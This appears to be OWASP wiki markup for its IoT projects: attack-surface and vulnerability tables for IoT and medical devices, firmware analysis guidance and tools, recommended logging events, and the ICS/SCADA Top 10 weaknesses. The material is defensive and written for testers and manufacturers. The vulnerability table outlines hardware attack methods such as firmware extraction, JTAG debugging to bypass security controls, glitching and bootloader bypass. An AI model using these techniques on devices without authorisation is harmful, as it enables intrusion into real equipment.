! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
